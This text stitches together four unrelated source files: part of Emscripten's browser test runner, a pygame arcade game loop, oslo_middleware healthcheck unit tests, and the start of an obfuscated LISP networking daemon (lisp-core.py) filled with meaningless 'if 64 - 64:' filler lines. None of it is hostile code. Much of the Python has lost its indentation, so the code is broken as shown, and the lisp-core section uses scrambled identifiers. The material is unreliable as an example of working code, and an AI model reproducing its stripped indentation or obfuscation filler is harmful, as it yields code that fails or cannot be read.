total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
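          // 'wrong' is the mean absolute per-channel (RGB) difference between the
          // reference image and the rendered canvas, floored so minor antialiasing
          // noise does not fail the test; btest() accepts any value up to
          // reference_slack as a pass.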
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
    # Inject support code for reporting results. This adds an include of a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-s', 'IN_TEST_HARNESS']
if reporting != Reporting.NONE:
      # For basic reporting we inject JS helper functions to report results back to the server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
        # If C reporting (i.e. the REPORT_RESULT macro) is required, also
        # compile in report_result.cpp and force-include report_result.h
args += ['-I', path_from_root('tests'),
'-include', test_file('report_result.h'),
test_file('report_result.cpp')]
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
    with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args[:]
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING'], message, timeout=timeout)
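  # Illustrative btest() invocations (the file names and expected values here are
  # hypothetical, shown only to demonstrate the two reporting styles above):
  #   self.btest('hello_webgl.c', reference='hello_webgl.png', reference_slack=1,
  #              args=['-lGL'])                           # reftest against an image
  #   self.btest('report_result_demo.c', expected='42')   # REPORT_RESULT-based test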
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = os.path.join(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
  shutil.copytree(source_dir, project_dir) # sometimes useful in debugging to comment this out, along with the two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
      print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, config.JS_ENGINES))
if len(working_engines) < len(config.JS_ENGINES):
    print('Not all the JS engines in JS_ENGINES appear to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
skipped = False
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
suite = getattr(m, suite_name, None)
if suite:
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
skipped = True
break
assert skipped, "Not able to skip test " + test
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
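# Examples of the 'random' argument syntax parsed above: 'random' -> 1 test from
# the default core mode, 'random8' -> 8 such tests, 'randomother3' -> 3 tests
# from the 'other' suite, 'randombrowser2' -> 2 browser tests.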
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
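  # e.g. num_tests=25  -> std=0.10 -> expected=90.00%
  #      num_tests=100 -> std=0.05 -> expected=95.00%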
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other', 'test_posixtest')
if not EMTEST_SAVE_DIR and not DEBUG:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
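# Note: a ParallelTestSuite is only chosen when the module supports it, there is
# more than one test, more than one core is available, and neither EMTEST_SAVE_DIR
# nor DEBUG is set; otherwise tests run serially in a plain unittest.TestSuite.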
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
game.py
|
import logging
import pygame as pg
from datetime import datetime
import g_var
from keyboard import Keyboard
from frame import Frame
from record import Record
from utils import rm, upload_ig, get_layout_imgs, load_all_imgs, load_all_walls
from constant import game_settings
from stage import (
WelcomeStage,
ScanStage,
LoadingStage,
ConfirmStage,
IntroStage,
Level,
Rank,
)
logging.basicConfig(level=logging.INFO, format='%(asctime)-15s:%(levelname)s:%(name)s:%(message)s')
logger = logging.getLogger(__name__)
class Stages:
def __init__(self, states, stages):
self._states = states
self._stages = stages
self.state_idx = 0
@property
def num_states(self):
return len(self._states)
@property
def state(self):
return self._states[self.state_idx]
@property
def stage(self):
return self._stages[self.state]
def change_stage(self):
if self.num_states == 0:
return
self.state_idx += 1
self.state_idx %= self.num_states
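# Minimal usage sketch of the Stages state machine above (StageA/StageB are
# hypothetical; the real wiring with WelcomeStage, Level, etc. is in Game below):
#   s = Stages(states=['a', 'b'], stages={'a': StageA(), 'b': StageB()})
#   s.stage.tick(keyboard)   # tick the currently active stage
#   s.change_stage()         # advance cyclically: a -> b -> a -> ...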
class Game(Stages):
def __init__(self, player_name):
rm(player_name)
self.record = None
self.player_name = player_name
self.bg_frames = Frame(g_var.surface, get_layout_imgs('bg'))
self.bar_frames = Frame(g_var.surface, get_layout_imgs('bar'))
super().__init__(
states=[
'welcome',
'scan',
'loading',
'confirm',
'intro1',
'level1',
'intro2',
'level2',
'intro3',
'level3',
'rank',
],
stages={
'welcome': WelcomeStage(),
'scan': ScanStage(player_name),
'loading': LoadingStage(player_name),
'confirm': ConfirmStage(player_name),
'intro1': IntroStage('intro1'),
'level1': Level('level1', player_name),
'intro2': IntroStage('intro2'),
'level2': Level('level2', player_name),
'intro3': IntroStage('intro3'),
'level3': Level('level3', player_name),
'rank': Rank(player_name),
},
)
@property
def is_playing_stage(self):
return 'level' in self.state or 'intro' in self.state
def tick(self, keyboard):
logger.info('Game tick')
self.bg_frames.tick()
if not self.is_playing_stage:
self.bar_frames.tick()
status = self.stage.tick(keyboard)
if status:
if 'welcome' == self.state:
g_var.player_score = game_settings['starting_scores']
elif 'level' in self.state:
g_var.player_score -= len(self.stage.viewbox.house.connection.connects)
if 'level3' == self.state:
rec = {
'name': self.player_name,
'score': g_var.player_score,
'datetime': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
}
rec['caption'] = '{} \n{} score: {}'.format(
rec['datetime'], rec['name'], rec['score'])
self.record = rec
upload_ig(rec['name'], rec['caption'])
elif 'rank' == self.state:
return True
self.change_stage()
g_var.screen.blit(g_var.surface, (0, 0))
return False
class RankGame:
def __init__(self, is_ready=False):
self._game = None
self._keyboard = None
self.is_ready = is_ready
self.bg_frames = Frame(g_var.surface, get_layout_imgs('bg'))
self.ball_frames = Frame(g_var.surface, get_layout_imgs('loading/ball'))
self.bar_frames = Frame(g_var.surface, get_layout_imgs('bar'))
@property
def player_idx(self):
return len(g_var.records.df) + game_settings['start_player_idx']
@property
def player_name(self):
return 'Player-{:03d}'.format(self.player_idx)
@property
def game(self):
if self._game is None:
self._game = Game(self.player_name)
return self._game
@property
def keyboard(self):
if self._keyboard is None:
self._keyboard = Keyboard()
return self._keyboard
def tick(self, keyboard):
# logger.info('RankGame tick')
if not self.is_ready:
self.bg_frames.tick()
self.ball_frames.tick()
self.bar_frames.tick()
return
status = self.game.tick(keyboard)
if status:
logger.info('record {}'.format(self.game.record))
g_var.records.add(self.game.record)
g_var.player_idx = self.player_idx
self._game = None
def start(self):
while True:
# get pygame events
events = pg.event.get()
logger.debug('events: {}'.format(events))
# update keyboard
self.keyboard.update(events)
logger.debug('keyboard: {}'.format(self.keyboard.keys))
            # exit when the player closes the pygame display window
if any([e.type == pg.QUIT for e in events]):
break
            # exit when the player presses ESC
if self.keyboard.is_pressed(pg.K_ESCAPE):
break
# tick
self.tick(self.keyboard)
# refresh pygame display
pg.display.flip()
# delay 1/frame_rate time by pygame clock
g_var.pg_clock.tick(game_settings['frame_rate'])
def init(rank_game):
    # load all images and walls first during init
load_all_imgs()
load_all_walls()
rank_game.is_ready = True
def main():
# init pygame
pg.init()
pg.display.set_caption(game_settings['game_title'])
# init pygame screen
# display_flags = pg.DOUBLEBUF | pg.RESIZABLE
display_flags = pg.FULLSCREEN | pg.HWSURFACE | pg.DOUBLEBUF | pg.RESIZABLE
g_var.screen = pg.display.set_mode(tuple(game_settings['screen_size']), display_flags)
# init pygame surface
surface_flags = pg.HWACCEL | pg.HWSURFACE
g_var.surface = pg.Surface(g_var.screen.get_size(), flags=surface_flags).convert()
# init pygame clock
g_var.pg_clock = pg.time.Clock()
# init player_score
g_var.player_score = game_settings['starting_scores']
# init records
g_var.records = Record()
# init player_idx
g_var.player_idx = game_settings['start_player_idx']
# init RankGame
rank_game = RankGame()
# TODO: create a thread to load images
# init_thread = threading.Thread(target=init, args=[rank_game, pg])
# init_thread.start()
init(rank_game)
# run rank game
rank_game.start()
# quit pygame
pg.quit()
if __name__ == "__main__":
main()
|
test_healthcheck.py
|
# Copyright (c) 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
import mock
from oslo_config import fixture as config
from oslotest import base as test_base
import requests
import webob.dec
import webob.exc
from oslo_middleware import healthcheck
from oslo_middleware.healthcheck import __main__
class HealthcheckMainTests(test_base.BaseTestCase):
def test_startup_response(self):
server = __main__.create_server(0)
th = threading.Thread(target=server.serve_forever)
th.start()
self.addCleanup(server.shutdown)
while True:
try:
# Connecting on 0.0.0.0 is not allowed on windows
# The operating system will return WSAEADDRNOTAVAIL which
# in turn will throw a requests.ConnectionError
r = requests.get("http://127.0.0.1:%s" % (
server.server_address[1]))
except requests.ConnectionError:
# Server hasn't started up yet, try again in a few.
time.sleep(1)
else:
self.assertEqual(200, r.status_code)
break
class HealthcheckTests(test_base.BaseTestCase):
def setUp(self):
super(HealthcheckTests, self).setUp()
self.useFixture(config.Config())
@staticmethod
@webob.dec.wsgify
def application(req):
return 'Hello, World!!!'
def _do_test_request(self, conf={}, path='/healthcheck',
accept='text/plain', method='GET',
server_port=80):
self.app = healthcheck.Healthcheck(self.application, conf)
req = webob.Request.blank(path, accept=accept, method=method)
req.server_port = server_port
res = req.get_response(self.app)
return res
def _do_test(self, conf={}, path='/healthcheck',
expected_code=webob.exc.HTTPOk.code,
expected_body=b'', accept='text/plain',
method='GET', server_port=80):
res = self._do_test_request(conf=conf, path=path,
accept=accept, method=method,
server_port=server_port)
self.assertEqual(expected_code, res.status_int)
self.assertEqual(expected_body, res.body)
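    # The two helpers above drive the Healthcheck middleware directly with a
    # plain dict of options; 'conf' takes the same keys the middleware reads
    # when deployed (e.g. 'path', 'backends', 'detailed', 'disable_by_file_path'),
    # as exercised by the tests below.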
def test_default_path_match(self):
self._do_test()
def test_default_path_not_match(self):
self._do_test(path='/toto', expected_body=b'Hello, World!!!')
def test_configured_path_match(self):
conf = {'path': '/hidden_healthcheck'}
self._do_test(conf, path='/hidden_healthcheck')
def test_configured_path_not_match(self):
conf = {'path': '/hidden_healthcheck'}
self._do_test(conf, path='/toto', expected_body=b'Hello, World!!!')
@mock.patch('oslo_middleware.healthcheck.disable_by_file.LOG')
def test_disablefile_unconfigured(self, fake_log):
fake_warn = fake_log.warning
conf = {'backends': 'disable_by_file'}
self._do_test(conf, expected_body=b'OK')
self.assertIn('disable_by_file', self.app._backends.names())
fake_warn.assert_called_once_with(
'DisableByFile healthcheck middleware '
'enabled without disable_by_file_path '
'set'
)
def test_disablefile_enabled(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar'}
self._do_test(conf, expected_body=b'OK')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_enabled_head(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar'}
self._do_test(conf, expected_body=b'', method='HEAD',
expected_code=webob.exc.HTTPNoContent.code)
def test_disablefile_enabled_html_detailed(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar', 'detailed': True}
res = self._do_test_request(conf, accept="text/html")
self.assertIn(b'Result of 1 checks:', res.body)
self.assertIn(b'<TD>OK</TD>', res.body)
self.assertEqual(webob.exc.HTTPOk.code, res.status_int)
def test_disablefile_disabled(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_disabled_head(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'', method='HEAD')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_disabled_html_detailed(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename, 'detailed': True}
res = self._do_test_request(conf, accept="text/html")
self.assertIn(b'<TD>DISABLED BY FILE</TD>', res.body)
self.assertEqual(webob.exc.HTTPServiceUnavailable.code,
res.status_int)
def test_two_backends(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file,disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE\nDISABLED BY FILE')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disable_by_port_file(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "80:%s" % filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self.assertIn('disable_by_files_ports', self.app._backends.names())
def test_no_disable_by_port_file(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "8000:%s" % filename}
self._do_test(conf,
expected_code=webob.exc.HTTPOk.code,
expected_body=b'OK')
self.assertIn('disable_by_files_ports', self.app._backends.names())
def test_disable_by_port_many_files(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
filename2 = self.create_tempfiles([('test2', 'foobar2')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "80:%s,81:%s" % (filename, filename2)}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE',
server_port=81)
self.assertIn('disable_by_files_ports', self.app._backends.names())
|
lisp-core.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import json
import sys
import socket
import thread
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = ""
if 60 - 60: I1ii11iIi11i + I1Ii111 - I11i / i1IIi
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = [ None , None , None ]
o0oOoO00o = None
if 43 - 43: Ii1I . oO0o
if 27 - 27: OoO0O00 - O0 . I1Ii111 * iII111i - I1ii11iIi11i
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def oO0 ( command = "" , data_structure = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 72 - 72: Oo0Ooo % OOooOOo . I1IiiI / I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 6 - 6: OoOoOO00 * iII111i
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 67 - 67: ooOoO0o - oO0o * o0oOOo0O0Ooo % o0oOOo0O0Ooo % I11i * OoOoOO00
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 26 - 26: Ii1I - o0oOOo0O0Ooo
if 63 - 63: II111iiii . II111iiii
if 32 - 32: i1IIi . I11i % OoO0O00 . o0oOOo0O0Ooo
if 42 - 42: I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if ( command == "data" and data_structure != "" ) :
II = bottle . request . body . readline ( )
IIIi1i1I = json . loads ( II ) if II != "" else ""
if ( IIIi1i1I != "" ) : IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if ( IIIi1i1I == [ ] ) : IIIi1i1I = ""
if 14 - 14: Oo0Ooo . I1IiiI / Ii1I
if ( type ( IIIi1i1I ) == dict and type ( IIIi1i1I . values ( ) [ 0 ] ) == dict ) :
IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
IIIi1i1I = o0o00ooo0 ( data_structure , IIIi1i1I )
return ( IIIi1i1I )
if 96 - 96: O0 % oO0o % iIii1I11I1II1
